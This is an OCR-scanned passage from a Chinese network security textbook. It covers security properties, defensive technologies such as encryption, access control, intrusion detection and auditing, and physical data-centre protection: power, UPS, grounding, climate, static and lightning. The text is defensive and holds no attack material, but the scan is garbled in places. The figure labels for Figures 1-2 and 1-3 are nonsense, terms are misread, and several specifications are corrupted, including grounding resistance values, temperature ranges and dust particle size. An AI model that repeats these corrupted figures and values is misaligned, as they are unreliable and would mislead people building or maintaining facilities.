权 机 构 可 以 随时 控制 信息 的 机 密 性 ， 对 网 络 信息 实施 严密 的 安全 监控 。 而 对 于 网 络 的 可 控 
性 是 指 安全 部 门 能 够 保证 网 络 不 被 非法 利用 和 控制 的 特性 。 
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6) 不 可 否认 性 

不 可 否认 性 也 叫 可 审查 性 ， 是 指 网 络 通信 双方 在 交互 信息 的 过 程 中 ， 确 信 参 与 者 本 身 
以 及 所 提供 信息 的 真实 统一 性 。 也 就 是 参与 者 不 可 能 否认 自己 的 身份 和 完成 的 操作 。 利 用 
信息 源 证 据 可 以 防止 发 信 方 不 真实 地 否认 已 发 送信 息 ， 利 用 递交 接收 证 据 可 以 防止 收 信 方 
事后 否认 已 经 接收 的 信息 。 

这 些 技术 指标 是 对 网 络 和 信息 安全 的 基本 要 求 ， 也 是 所 有 安全 产品 和 安全 管理 人 员 的 
共同 目标 。 


1.2.2 网络 安 全 的 研究 目标 和 研究 的 内 容 


1. 网 络 安全 的 研究 目标 


网 络 安全 的 研究 目标 是 : 在 网 络 信息 的 存储 、 传 输 、 交 互 和 处 理 的 整个 过 程 中 ， 提 供 
物理 上 和 逻辑 上 的 防护 、 监 控 、 反 应 恢复 及 对 抗 的 能 力 ， 以 保护 网 络 信息 资源 的 保密 性 、 
完整 性 、 可 用 性 、 可 控 性 、 可 靠 性 和 抗 抵 赖 性 。 


2. 网 络 安全 研究 的 内 容 


网 络 安全 是 一 门 交 叉 学 科 ， 涉 及 的 内 容 广泛 ， 除 了 上 面 提 到 的 数学 、 通 信 、 计 算 机 等 
自然 科学 外 ， 还 包括 法 律 和 心理 学 等 社会 科学 的 内 容 。 我 们 这 里 讲 的 网 络 安全 主要 从 自然 
科学 方面 讨论 ， 网 络 安全 的 最 终 目的 是 信息 安全 ， 信 息 安全 研究 的 相关 内 容 及 相互 关系 如 
图 1-2 所 示 。 


安全 目标 : 保密 性 、 完 整 性 、 可 用 性 、 抗 否定 性 
安全 管理 
平台 安全 ， 
安全 标准 “| 一 和 物理 安全 。 网 络 安全 。 系统 安全 
数据 安全 。 边界 安全 。 用 户 安全 
安全 策略 
安全 理论 ， 
漏洞 扫描 技术 光 才 于 六 
Wt 入 侵 检 测 技术 和 
站 审计 追踪 
安全 协议 
安全 监控 
密码 理论 ， 数据 加 密 、 数 字 签 名 、 消 息 摘要 、 密 铀 管理 


1-2 ”信息 安全 的 内 容 及 相互 关系 
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1) “实体 安全 (Physical Security) 

网 络 实体 是 指 保护 计算 机 设备 、 设 施 ( 含 网 络 ) 以 及 其 他 媒体 免 遭 地 震 、 水 灾 、 火 灾 、 
有 害 气体 和 其 他 环境 事故 破坏 的 措施 和 过 程 ， 包 括 环境 安全 、 设 备 安全 和 媒体 安全 三 个 方 
面 。 对 于 实体 安全 方面 国家 制定 了 一 些 标准 ， 如 《电子 信息 系统 机 房 设 计 规 范 (GB 50174 
一 2008)》、《 电 子 信息 系统 机 房 施 工 及 验收 规范 (GB 50462 一 2008)》 等 ， 具 体内 容 在 下 一 
节 详 细 介绍 。 

2) “运行 安全 (Operation Security) 

运行 安全 是 网 络 安全 的 保障 。 在 系统 或 网 络 运行 时 ， 为 保护 信息 处 理 过 程 的 安全 而 提 
供 的 一 套 安全 措施 称 为 运行 安全 ， 包 括 风险 分 析 、 审 计 跟 踪 、 备 份 与 恢复 、 应 急 处 理 、 安 
全 和 运行 检测 、 系 统 修复 等 。 

3) “系统 安全 (System Security) 

系统 安全 是 指 为 保证 操作 系统 、 数 据 库 系统 和 通信 系统 安全 采取 的 一 套 安全 措施 。 如 
为 操作 系统 安装 防火 墙 和 杀毒 软件 ， 为 数据 库 系统 设置 访问 控制 ， 另 外 还 包括 定期 检查 和 
评估 、 系 统 安全 监测 、 灾 难 恢复 机 制 、 系 统 改造 管理 、 跟 踪 最 新 安全 漏洞 、 系 统 升级 和 补 
丁 修 复 等 措施 。 

4) ”应 用 安全 (Application Security) 

应 用 安全 是 为 了 保护 应 用 软件 开发 平台 和 应 用 系统 的 安全 采取 的 安全 措施 。 应 用 安全 
非常 重要 ， 网 络 的 最 终 目的 是 应 用 ， 且 各 种 应 用 是 信息 数据 最 直接 的 载体 ， 应 用 系统 的 脆 
弱 性 是 网 络 系统 和 信息 最 为 致命 的 威胁 之 一 。 应 用 系统 一 旦 被 侵入 ， 数 据 信 息 势 必 大 量 泄 
露 ， 更 为 可 怕 的 是 ， 攻 击 者 会 以 此 为 跳板 ， 攻 击 操作 系统 以 及 其 他 与 之 相连 的 网 络 设备 ， 
后 果 严 重 。 

应 用 系统 在 投入 使 用 之 前 ， 必 须 经 过 严格 的 测试 。 针 对 应 用 安全 提供 的 评估 措施 有 : 
业务 软件 的 程序 安全 性 测试 、 业 务 交 往 的 抗 抵赖 测试 、 业 务 资源 的 访问 控制 验证 测试 、 业 
务实 体 的 身份 鉴别 检测 、 业 务 现场 的 备份 与 恢复 机 制 检 查 、 业 务 数据 的 唯一 性 /一 致 性 / 防 
冲突 检测 、 业 务 数 据 的 保密 性 测试 、 业 务 系统 的 可 靠 性 测试 、 业 务 系统 的 可 用 性 测试 。 测 
试 之 后 ， 开 发 人 员 应 依据 测试 结果 对 系统 进行 修复 。 

5) ”管理 安全 (Management Security) 

管理 安全 主要 指 对 人 和 网 络 系统 安全 管理 的 法 规 、 政 策 、 策 略 、 规 范 、 标 准 、 技 术 手 
段 、 机 制 和 措施 等 ， 如 确定 安全 管理 等 级 和 安全 管理 范围 ， 制 定 网 络 设备 及 服务 器 使 用 规 
程 ， 建 立 网 络 事件 记录 机 制 ， 制 定 应 急 响 应 措施 ， 制 定 系统 和 数据 备份 、 恢 复 措 施 。 管 理 
安全 还 包括 人 员 管理 、 培 训 管理 、 系 统 和 软件 管理 、 文 档 管理 和 机 房管 理 等 。 

在 制定 各 项 措施 的 时 候 要 充分 考虑 实际 条 件 ， 要 保证 制定 出 切实 可 行 的 策略 和 规则 ， 
好 的 安全 管理 机 制 可 以 为 用 户 综合 控制 风险 、 降 低 损 失 和 消耗 、 促 进 安 全 生产 效益 。 


1.2.3 ”网络 安全 防护 技术 


网 络 攻击 行为 日 渐 增 加 ， 攻 击 技术 也 越 来 越 复杂 。 在 与 各 种 网 络 威胁 作 斗 争 的 过 程 
中 ， 网 络 安全 防护 技术 也 得 到 了 长 足 发 展 。 从 被 动 防护 到 主动 监测 ， 提 前 预防 ， 目 前 已 经 
有 具备 了 一 些 有 效 的 防护 技术 ， 这 些 技术 的 综合 运用 可 以 有 效 地 抵御 网 络 攻击 ， 有 些 研 究 成 
果 已 经 转化 为 产品 ， 应 用 在 各 大 网 络 中 。 
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网 络 安全 防护 技术 大 体 上 可 以 分 为 五 类 : 加 密 技术 、 访 问 控制 技术 、 检 测 技 术 、 监 控 
技术 和 审计 技术 ， 如 图 1-3 所 示 。 


pd 数字 水 印 
加 密 技术 二 数字 签名 
信息 隐藏 
本 虚拟 专用 网 
访问 控制 技术 震 3 
RE | 护 火 培 技 术 | PP 
NSE 
> 头像 识别 
pp ZO 电子 钥匙 | 头像 识别 | 
检测 技术 se 语音 识别 
法 指纹 识别 
AS 
监控 技术 LN 


图 1-3 网 络 安全 防护 技术 
1. 加 密 技术 


加 密 技术 的 目的 是 把 可 读 信 息 通 过 某 种 技术 手段 转变 成 不 可 理解 的 密 文 ， 起 到 信息 保 
护 的 作用 。 可 读 信息 不 仅 包 括 数据 和 文本 ， 还 包括 程序 代码 、 语 音 、 图 像 和 视频 流 以 及 各 
种 形式 和 类 型 的 文件 。 按 照 实施 对 象 的 不 同 ， 加 密 技术 可 分 为 文件 加 密 、 口 令 加 密 和 传输 
加 密 。 

加 密 技术 包含 两 个 重要 元 素 : 加 密 算法 和 密 钥 。 加 密 算法 是 通过 基于 数学 或 物理 变 
换 ， 把 信息 从 明文 变 为 密 文 ， 或 者 将 数据 隐藏 变 得 不 可 见 ， 密 钥 是 用 来 对 数据 进行 编码 和 
解码 的 一 种 算法 ， 是 加 密 算法 的 参数 。 

根据 编码 和 解码 是 否 采 用 同一 密 钥 ， 加 密 技 术 分 为 对 称 加 密 技 术 和 非 对 称 加 密 技术 。 
在 传统 的 密码 体制 中 ， 数 据 的 加 密 和 解密 过 程 采用 同一 密 钥 ， 即 私 钥 ， 这 就 是 对 称 加 密 技 


到 网 络 安全 与 管理 


术 。 它 的 优点 是 能 经 受 住 时 间 的 检验 ， 保 密 性 强 ， 可 以 有 效 地 抵御 各 种 攻击 ; 缺点 是 私 钥 
的 传送 必须 通过 非常 安全 的 途径 ， 私 钥 管理 非常 关键 。 典 型 的 对 称 加 密 算法 有 DES、 
AES、IDEA 和 FEAL-N 等 。 

非 对 称 加 密 技术 的 发 送 端 和 接收 端 使 用 互 不 相同 的 密 钥 ， 一 个 密 钥 公开 ， 一 个 密 钥 保 
密 ， 几 乎 不 可 能 从 加 密 密 钥 中 推导 出 解密 密 钥 ， 又 称 公 钥 密码 技术 。 现 在 的 密码 体制 中 使 
用 非 对 称 加 密 技 术 的 很 多 。 它 的 优点 是 可 以 适应 网 络 的 开放 性 要 求 ， 密 钥 的 管理 相对 简 
单 ， 可 以 方便 地 实现 数字 签名 和 认证 ; 缺点 是 数据 加 密 的 速率 较 低 ， 算 法 也 比较 复杂 。 典 
型 的 非 对 称 加 密 算法 有 RSA、ECC 和 Diffe-Hellman 等 。 


2. 访问 控制 技术 


访问 控制 技术 是 对 网 络 信息 进行 保护 的 最 基础 的 安全 措施 ， 也 是 网 络 安全 防御 中 重要 
的 安全 机 制 ， 它 通过 访问 控制 策略 限制 主体 对 客体 的 访问 。 网 络 访问 控制 技术 以 身份 识别 
为 基础 ， 根 据 主 体 身份 对 资源 访问 请 求 加 以 限制 。 实 现 网 络 访问 控制 技术 的 方法 多 种 多 
样 ， 经 常 和 其 他 安全 防护 技术 混合 使 用 ， 比 较 常 用 的 有 身份 识别 、 防 火 墙 技 术 和 P 安全 等 。 

用 户 使 用 合法 的 用 户 名 和 口令 登录 系统 是 最 基本 的 身份 识别 方式 。 系 统管 理 员 创建 用 
户 时 ， 可 根据 实际 需求 把 用 户 分 为 不 同 的 等 级 或 者 角色 ， 同 一 等 级 的 用 户 对 资源 有 相同 的 
访问 权限 ， 还 可 以 为 每 个 级 别 或 角色 指定 不 同 的 身份 认证 方式 ， 比 如 对 管理 员 用 户 指 定 严 
格 的 认证 机 制 ， 确 保 系统 安全 可 靠 。 


3. 网 络 安全 检测 与 监控 技术 


安全 监测 技术 包括 安全 监控 技术 和 安全 扫描 技术 。 安 全 监控 技术 利用 软件 或 硬件 对 网 
络 数据 进行 实时 监控 ， 一 旦 发 现 有 被 攻击 的 迹象 ， 则 立即 启动 响应 预警 机 制 ， 根 据 用 户 的 
预定 义 采 取 相 应 的 动作 ， 可 以 切断 网 络 连接 ， 也 可 以 过 滤 该 入 侵 数据 包 。 安 全 监控 系统 通 
常 包 括 一 个 完备 的 系统 入 侵 特征 数据 库 ， 这 是 及 时 发 现 网 络 攻 击 的 关键 。 入 侵 检测 系统 
(IDS) 是 安全 监控 技术 运用 的 成 功 典范 ， 能 够 帮助 管理 员 对 付 各 种 网 络 攻 击 和 试探 。 

安全 扫描 技术 是 通过 对 局 域 网 、 服 务 器 和 网 络 设备 进行 定期 扫描 ， 来 发 现 安全 漏洞 并 
及 时 修复 的 方法 ， 是 安全 防御 中 常用 的 技术 。 蜜 钢 技 术 是 另 一 种 发 现 系 统 漏洞 的 方法 ， 蜜 
饶 也 叫 蜜 网 ， 它 故意 引诱 黑客 进行 攻击 ， 黑 客 入 侵 后 ， 管 理 员 就 可 以 分 析 黑 客 所 使 用 的 攻 
击 手 段 和 方法 了 。 


4. 网 络 安全 审计 技术 


网 络 安全 审计 是 指 在 一 个 特定 的 网 络 环境 下 ， 为 了 保障 网 络 系统 和 信息 资源 不 受 内 外 
网 用 户 的 入 侵 和 破坏 ， 运 用 各 种 技术 手段 实时 收集 和 监控 网 络 环境 中 每 一 个 组 成 部 分 的 安 
全 状态 、 安 全 事件 ， 以 便 集中 报警 、 分 析 和 处 理 的 一 种 技术 手段 。 它 从 部 署 上 可 分 为 内 网 
安全 审计 和 外 网 接 入 审计 。 上 网 行为 管理 和 计算 机 取证 均 是 采用 安全 审计 技术 的 解决 方案 。 


1.3 ”实体 安全 概述 


计算 机 网 络 实体 是 网 络 信息 的 载体 ， 是 网 络 系统 的 核心 ， 实 体 的 安全 是 信息 安全 的 基 
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本 保障 。 本 节 主 要 讲述 实体 安全 的 内 容 ， 包 括 网 络 机 房 基 础 设施 安全 、 机 房 环 境 安 全 和 设 
备 的 安全 保护 。 


1.3.1 实体 安全 的 概念 


实体 安全 也 称 物理 安 全 ， 是 指 保护 网 络 机 房 设施 、 网 络 设备 以 及 其 他 媒体 免 遭 地 震 、 
水 灾 、 火 灾 、 有 害 气体 和 其 他 环境 事故 (如 电磁 污染 等 ) 破 坏 的 措施 及 过 程 。 对 机 房 设 施 的 
保护 包括 防火 、 防 水 、 防 雷 、 防 尘 、 防 静电 、 防 盗 、 防 电磁 干扰 等 ， 对 网 络 设备 的 保护 包 
括 制定 设备 安全 管理 制度 、 设 定 访问 控制 策略 、 启 用 设备 和 协议 的 安全 配置 等 。 


1.3.2 ”机 房 基础 设施 安全 


在 网 络 机 房 的 场地 选择 、 装 修 、 管 理 和 维护 的 过 程 中 应 考虑 网 络 机 房 的 特点 ， 严 格 按 
照 网 络 机 房 的 各 种 规范 实行 ， 保 护 网 络 设备 ， 降 低 安 全 隐患 。 


1. 机 房 场地 安全 


网 络 机 房 选 址 时 ， 应 遵循 以 下 原则 : 

(1) 网 络 机 房 必须 安全 可 靠 ， 因 此 机 房 的 选 址 应 该 远离 有 害 气体 和 危险 品 的 存放 地 、 
远离 强 振动 源 和 强 噪声 源 、 远 离 电 磁 干 扰 、 远 离 灰 尘 等 。 

(2) 网 络 机 房 应 避免 设置 在 低洼 和 潮湿 的 房间 ， 避 免 设置 在 光照 强 的 房间 ， 这 样 会 加 
大 空调 系统 的 负荷 。 另 外 ， 为 了 方便 大 型 设备 移动 ， 也 要 尽量 避 开 高 层 。 

(3) 机 房 周围 应 具备 一 定 的 安全 保障 ， 防 止 非法 暴力 入 侵 ， 比 如 具备 多 层 屏障 和 围墙 
等 ， 机 房 外 面 应 具备 足够 亮度 的 照明 设施 ， 应 方便 安装 监控 。 


2. 机 房 装修 安全 


网 络 机 房 装饰 装修 的 过 程 中 ， 应 该 考虑 以 下 几 点 

(1) 网 络 机 房 使 用 的 所 有 装修 材料 必须 符合 TJ16(《 建 筑 设 计 防 火 规 范 》， 最 新 标准 
号 为 GB 50016 一 2010) 中 规定 的 难 燃 材料 或 非 燃 材料 ， 另 外 还 应 该 具有 防潮 、 抗 静电 等 
功能 。 

(2) 机 房 应 该 安装 活动 地 板 ， 方 便 走 线 ， 地 板材 料 应 符合 (D) 中 的 要 求 ， 地 板 支 脚 和 
地 板 下 的 地 面 应 平整 、 光 滑 ， 避 免 走 线 时 损伤 电线 。 

(3) 机 房 的 窗户 密闭 性 要 好 ， 做 到 防 尘 、 隔 音 ， 最 好 选用 双 层 密闭 玻璃 ， 如 果 有 光照 
应 加 装 遮光 窗帘 。 

(4) 机 房 空调 通风 管道 ， 地 板 下 及 吊顶 上 的 送 、 回 风口 要 定期 清理 ， 新 风 系统 安装 空 
气 过 滤 设 施 。 

(5) 机 房 内 安装 足够 亮度 的 照明 设施 ， 充 分 考虑 用 电 负 荷 。 另 外 ， 设 计 安装 网 络 机 房 
的 供电 系统 时 ， 还 要 遵循 动力 用 电 、 照 明 用 电 和 网 络 设备 用 电 分 开 的 原则 。 

(6) 机 房 应 安装 监控 和 报警 装置 ， 配 备 灭火 器 ， 预 防 意 外 灾害 和 非法 进入 。 

另外 ， 还 可 以 对 网 络 机 房 的 环境 、 设 备 进行 监控 ， 随 时 了 解 环境 和 设备 的 状况 ， 以 便 
于 及 时 采取 措施 保护 机 房 及 设备 的 安全 。 对 环境 的 监控 包括 对 温度 、 湿 度 和 洁净 度 的 监 
控 ， 对 设备 的 监控 包括 对 供电 系统 、 空 调 系统 和 消防 安保 系统 运行 状态 的 监控 ， 比 如 电 
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压 、 电 流 的 状况 ， 监 控 系 统 除了 实时 监控 外 还 能 够 记录 历史 数据 ， 为 网 络 故障 处 理 和 安全 
管理 提供 依据 和 保障 。 


3. 机 房 的 管理 和 维护 


在 网 络 机 房 的 运行 维护 过 程 中 ， 要 制定 严格 的 管理 制度 ， 应 考虑 以 下 几 点 : 

e@ 机房 要 干净 卫生 、 要 经 常 清洁 ， 除 了 清洁 机 房 环 境 ( 地 面 、 窗 户 、 玻 璃 、 谈 盖 
物 、 通 风 管 道 等 ) 外 ， 也 要 定期 清洁 设备 ， 避 免 因 尘土 导致 设备 故障 ， 清 洁 设备 
内 部 时 慎 用 吸尘器， 另外 清洁 时 避免 扬尘 。 
机 房 的 空气 要 经 过 净化 处 理 ， 机 房 废气 要 及 时 排出 。 
制定 严格 的 机 房 出 入 管理 制度 ， 进 入 机 房 应 穿 鞋 套 或 换 拖鞋 ， 工 作 人 员 进 入 应 穿 

工作 服 或 者 佩戴 标志 ， 外 来 人 员 进入 要 进行 登记 和 佩戴 标志 ， 一 次 进入 机 房 的 人 
员 不 应 太 多 。 

e@ ”网 络 机 房 设施 和 设备 管理 应 由 专人 负责 ， 非 管理 员 不 能 操作 和 修改 配置 ， 记 录 设 
备 运行 日 志 ， 严 格 记 录 每 一 次 修改 和 配置 。 


4. 机 房 的 空调 系统 


网 络 机 房 的 空调 系统 一 般 处 于 长 期 制冷 的 运行 状态 ， 应 尽量 采用 专用 的 空调 设备 ， 避 
免 与 其 他 系统 和 其 他 房间 共用 ， 尤 其 避免 与 工作 用 房 共用 。 空 调 设备 使 用 到 的 材料 和 附件 
原料 应 采用 难 燃 或 非 燃 材料 。 网 络 机 房 的 空调 要 经 党 维护， 因此 安装 时 应 考虑 安装 在 安全 
和 便于 维修 的 地 方 。 

网 络 机 房 应 尽量 采用 风 冷 式 空调 ， 如 果 采 用 水 冷 式 空调 ， 要 设置 漏水 装置 。 


5. 机 房 的 电源 系统 


电源 系统 的 稳定 可 靠 对 网 络 设备 的 正常 运行 至 关 重 要 ， 电 压 波动 和 突然 断 电 可 能 造成 
设备 损坏 、 系 统 瘫 痪 等 意 想 不 到 的 网 络 故障 。 机 房 的 供电 系统 应 该 满足 国标 GB/T 2887 一 
2000(《 电 子 计算 机 场地 通用 规范 》) 和 GB 9361 一 88(《 计 算 站 场地 安全 要 求 》) 中 对 机 房 
安全 供电 的 要 求 。 对 电源 保护 的 安全 措施 可 分 为 两 个 方面 ， 电 源 工 作 连 续 性 的 保护 和 电源 
工作 稳定 性 的 保护 。 

1) ”工作 连续 性 保护 

目前 ， 大 部 分 网 络 机 房 配 备 不 间断 电源 (UPS) 保 证 机 房 工 作 电源 的 连续 性 ，UPS 由 主 
机 、 电 池 柜 和 大 量 的 蓄电池 组 成 ， 工 作 时 把 输入 的 交流 电 整 流 并 存储 到 电池 中 ， 外 部 电网 
一 旦 停止 供电 ，UPS 立即 启用 蓄电池 为 系统 供电 。 根 据 工作 原理 不 同 ， 通 常 把 UPS 分 为 
在 线 式 、 后 备 式 和 线 上 交错 式 。 

在 UPS 电源 的 使 用 和 维护 上 ， 必 须 严 格 遵守 其 操作 规程 。UPS 电源 应 避免 阳光 直 
射 ， 保 证 足够 的 通风 空间 。UPS 电源 禁止 频繁 地 开启 和 关闭 ， 禁 止 输出 端 接 感性 负载 ， 禁 
止 超 负载 使 用 ，UPS 电源 的 最 佳 额定 输出 功率 范围 为 30% 一 60% 之 间 ， 一 般 建 议 最 大 启动 
负载 控制 在 80% 之 内 。UPS 电源 还 需要 定期 维护 : 清除 内 部 积 尘 、 测 量 蓄电池 电压 、 更 
换 不 合格 电池 、 检 查 风 扇 运转 情况 ， 以 及 检测 调节 UPS 电源 的 系统 参数 ( 浮 充 电压 、 浮 充 
电流 、 端 电压 偏差 等 )， 维 护 之 前 应 注意 切断 电源 。 
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2) “工作 稳定 性 保护 

对 于 工作 电源 的 工作 稳定 性 保护 可 以 采用 隔离 稳 压 、 稳 压 稳 频 等 措施 ， 把 外 部 供电 经 
过 隔离 变压器 、 稳 压 器 、 整 流 器 等 电子 电路 的 变化 整形 后 ， 再 输出 给 各 种 设备 ， 以 减弱 和 
消除 外 部 供电 电压 的 波动 对 设备 的 影响 。 常 用 的 有 自动 感应 稳 压 器 、 纹 波 抑制 器 、 稳 压 稳 
频 器 等 。 


6. 机 房 的 接地 系统 


接地 系统 是 为 了 实现 各 种 电气 设备 的 零 电 位 点 与 大 地 作 良 性 电气 连接 ， 由 金属 接地 体 
引 至 各 种 电气 设备 零 电 位 部 位 的 一 切 装置 的 总 称 。 接 地 使 系统 中 各 处 电位 以 大 地 电位 为 基 
准 ， 为 设备 提供 一 个 稳定 的 0V 参考 点 位 。 

机 房 接地 是 机 房 建设 中 的 一 项 重要 内 容 ， 可 以 防止 寄生 电容 的 耦合 干扰 ， 保 证 系统 的 
电磁 兼容 功能 ， 防 止 电 磁 信 息 辐 射 ， 保 护 设 备 和 人 身 安 全 。 

接地 以 接地 电流 易于 流动 为 目的 ， 接 地 电阻 越 小 越 好 ， 机 房 接 地 的 综合 接地 电阻 应 小 
于 19。 机 房 接 地 系统 中 还 应 注意 ， 信 号 系统 和 电源 系统 、 高 压 系统 和 低压 系统 不 应 使 用 
共 地 回路 ， 灵 敏 电路 的 接地 应 各 自 隔离 或 屏蔽 ， 以 免 因 大 地 回流 和 静电 感应 产生 干扰 。 

根据 国家 标准 ， 网 络 机 房 有 四 种 接地 方式 : 直流 工作 地 、 交 流 工 作 地 、 安 全 保护 地 和 
防 雷 保护 地 。 机 房 接地 系统 应 采用 综合 接地 方案 。 

1) 直流 工作 地 

直流 接地 也 叫 逻 辑 接地 ， 直 流 工作 地 是 数字 电路 的 基准 电位 ， 不 一 定 是 大 地 电位 。 直 
流 接 地 有 两 种 方式 : 直流 地 悬浮 和 直流 地 接 大 地 。 在 直流 地 悬浮 中 ， 直 流 工作 地 不 接 大 
地 ， 与 大 地 严格 绝缘 ， 直流 地 接 大 地 就 是 把 机 房 中 数字 电路 的 等 位 地 与 大 地 相 接 ， 以 取得 
一 定 的 公共 电位 ， 减 少 电路 耦合 ， 降 低 干 扰 。 在 具体 的 接地 方法 上 又 可 分 为 3 种 类 型 : 串 
联接 地 、 并 联接 地 和 网 状 接地 。 

2) ”交流 工作 地 

网 络 机 房 中 有 大 量 的 设备 使 用 交流 供电 ， 因 此 机 房 的 交流 电 接地 也 十 分 必要 。 交 流 工 
作 地 就 是 把 机 房 的 交流 电 设备 做 两 次 接地 或 经 特 设 设备 与 大 地 作 人 金属 连接 。 通 常 采 用 的 方 
法 是 把 每 个 设备 的 中 性 点 用 绝缘 导线 连接 到 配 电 柜 的 中 线 上 ， 再 将 其 接地 。 

3) ”安全 保护 地 

通常 设备 的 外 壳 不 带电 ， 但 如 果 由 于 电路 损坏 或 某 些 意外 情况 致使 外 壳 带 电 ， 会 给 设 
备 和 工作 人 员 带 来 安全 隐患 。 把 与 设备 带电 部 分 绝缘 的 金属 外 壳 或 机 架 良 好 接地 ， 成 为 安 
全 保护 地 。 机 房 内 保护 地 线 接地 电阻 应 和 4， 接地 导线 应 为 4 号 铜 线 或 金属 带 线 ， 连 接 
采用 机 械 压 紧 方式 。 

4) ” 防 雷 保护 地 

防 雷 保护 地 主要 用 来 把 雷电 电流 引 泄 到 大 地 ， 消 除 雷 电 威胁 ， 保 护 设备 和 人 员 安 全 。 
单独 建设 的 机 房 必须 设置 专门 的 防 雷 保护 地 ， 且 每 年 至 少 检测 一 次 防 雷 接地 的 良好 程度 。 


1.3.3 ”机 房 环境 安全 


机 房 的 环境 安全 也 包括 设备 运行 环境 的 安全 ， 涉 及 机 房 的 温 湿 度 和 洁净 度 ， 机 房 的 防 
水 、 防 火 、 防 雷 、 防 静电 等 。 
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1. 机 房 的 温度 、 湿 度 和 洁净 度 


一 个 中 小 规模 的 网 络 机 房 (比如 一 个 大 学 的 中 心机 房 ) 如 果 关 闭 空调 系统 ， 即 便 是 冬天 
温度 也 可 迅速 升 至 40 多 度 ， 这 样 的 温度 会 严重 降低 电子 元 器 件 的 使 用 寿命 ， 甚 至 损坏 磁 
介质 。 温 度 过 低 时 ， 可 能 导致 硬盘 无 法 启动 ， 设 备 表 面 出 现 凝聚 水 珠 的 现象 ， 腐 蚀 机 器 。 
因此 对 机 房 温 度 的 控制 非常 重要 ， 按 规定 机 房 温 度 应 控制 在 20+2)C， 即 18 一 22C， 变 化 
率 为 2'C/ 小 时 ， 温 度 每 超过 规定 范围 10C， 设 备 的 可 靠 性 就 下 降 25%。 一 般 要 求 不 太 严 
格 的 时 候 也 可 把 机 房 温 度 控制 在 10~35'C。 

机 房 的 湿度 也 是 影响 网 络 设 备 正常 运行 的 重要 因素 。 湿 度 过 高 会 腐蚀 电子 设备 和 元 器 
件 ， 影 响 磁头 高 速 运转 ， 增 强 绝缘 介质 的 导电 性 ， 损 害 器 件 等 ; 湿度 过 低 ， 会 导致 某 些 器 
件 出 现 龟 裂 的 显现 。 另 外 ， 空 气 过 于 干燥 使 静电 感应 增加 ， 扩 大 了 静电 带 来 的 危害 。 一 般 
情况 下 ， 机 房 的 相对 湿度 应 为 30% 一 80%， 再 严格 一 点 ， 相 对 湿度 应 为 40% 一 60%6， 变 化 
率 为 25%/ 小 时 。 

灰尘 对 网 络 设备 的 影响 也 不 容 忽视 ， 可 导致 插件 接触 不 良 ， 降 低 发 热 器 件 散 热效率 ， 
增加 机 器 磨损 等 。 洁 净 度 要 求 机 房 尘 埃 颗 粒 直径 小 于 0.Shm， 平 均 每 升 空气 含 尘 量 小 于 1 
万 颗 。 

为 了 满足 网 络 机 房 对 温度 、 湿 度 和 洁净 度 的 要 求 ， 机 房 应 该 配备 空调 系统 、 去 /加 湿 
器 、 防 尘 除 尘 器 等 设备 ， 以 保证 网 络 设备 在 规定 的 环境 下 安全 运行 。 

2. 防火 、 防 水 


机 房 一 旦 发 生火 灾 ， 后 果 不 堪 设想 ， 所 有 的 机 房 设施 、 网 络 设备 以 及 软件 数据 必 将 毁 
于 一 旦 。 防 火 要 预防 为 主 ， 防 消 结合 。 加 强 防范 ， 设 置 报警 系统 和 灭火 装置 ， 加 强 防 火 安 
全 管理 ， 一 旦 失火 要 保持 镇 定 ， 积 极 扑 救 。 

机 房 受 到 水 浸 会 降低 电缆 和 电器 设备 的 绝缘 性 能 ， 严 重 时 会 损害 设备 。 因 此 ， 机 房 应 
具备 预防 、 隔 离 和 排水 措施 。 机 房 附 近 不 应 有 蓄 水 设备 ， 如 果 机 房 使 用 水 冷 式 制冷 设备 ， 
要 做 好 排水 、 防 水 措施 。 机 房 内 设备 避免 直接 接触 地 面 ， 尤 其 是 带电 设备 尽量 架空 固定 到 
设备 架 上 ， 对 机 房 的 房 顶 要 做 防水 处 理 等 。 


3. 静电 防护 


静电 是 电子 行业 最 难 消除 的 危害 之 一 ，1967 年 7 月 29 日 ， 美 国 Forrestal 航空 母 舰 上 
发 生 严 重 事故 ， 一 架 A4 飞机 上 的 导弹 突然 点 火 ， 造 成 了 7200 万 美元 的 损失 ， 并 造成 了 
134 人 伤亡 ， 调 查 结果 是 导弹 屏蔽 接头 不 合格 ， 静 电 引 起 了 点 火 。 

网 络 机 房 中 静电 的 危害 也 不 容 忽视 ， 静 电 电流 流 经 设备 表 壳 时 ， 会 对 信号 线 和 电源 线 
产生 感应 噪声 ， 静 电 放电 时 会 产生 辐射 噪声 ， 静 电 产 生 的 高 压 会 引起 电位 变化 。 对 于 计算 
机 外 设 ， 静 电 可 能 损坏 网 卡 ， 造 成 Modem、 打 印 机 的 误 操 作 。 

静电 对 设备 内 部 的 影响 更 为 严重 ， 半 导体 器 件 高 密度 和 高 增益 的 发 展 ， 导 致 器 件 本 身 
对 静电 的 反应 越 来 越 灵敏 ， 静 电 释 放 轻 则 引起 计算 机 运算 错误 ， 重 则 损坏 元 器 件 ， 例 如 损 
毁 MOSFET 和 CMOS 元 件 的 栅 极 CMOS 中 的 触发 器 锁 死 ，L/O 接口 问题 导致 三 极 管 烧 
毁 ; 主板 USB 接口 的 静电 释放 问题 引起 南 桥 烧 坏 等 。 

静电 引发 的 设备 故障 ， 原 因 很 难 查 找 ， 因 此 对 静电 要 以 预防 为 主 ， 通 常 可 以 采取 以 下 
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几 种 措施 : 
e ”把 机 房 内 的 温度 和 湿度 控制 在 合理 的 范围 内 ， 静 电 与 湿度 关系 密切 ， 湿 度 越 低 静 
电 越 容易 发 生 ， 尤 其 是 在 冬 春 干燥 季节 ， 可 以 在 机 房 中 放置 加 湿 设 备 。 
在 机 房 内 铺设 防 静 电 地 板 ， 使 用 防 静 电 装饰 材 料 ， 设 备 接地 。 
工作 人 员 进 入 机 房 尽 量 穿戴 防 静电 衣服 或 纯 棉 衣服 ， 在 机 房 操 作 时 避免 摩擦 。 
工作 人 员 拆 装 和 检修 网 络 设备 时 ， 应 在 手腕 上 佩戴 防 静 电 手 环 。 


4. 雷电 保护 


雷击 是 年 复 一 年 最 严重 的 自然 灾害 之 一 。 有 资料 显示 ， 每 年 全 球 因 雷击 造成 的 损失 高 
达 100 亿美 元 。 随 着 微 电 子 设备 高 集成 化 发 展 ， 设 备 的 耐 过 压 、 耐 过 流水 平 在 下 降 ， 对 雷 
电 浪 涌 的 承受 能 力也 在 下 降 。 

在 机 房 防 雷 方案 设计 上 应 从 整体 防 雷 角度 出 发 ， 采 取 综 合 防 雷 ， 即 直击 雷 的 防护 和 感 
应 雷 的 防护 ， 缺 一 不 可 。 另 外 还 要 根据 电气 、 微 电子 设备 的 不 同 功 能 、 受 保护 程度 和 所 属 
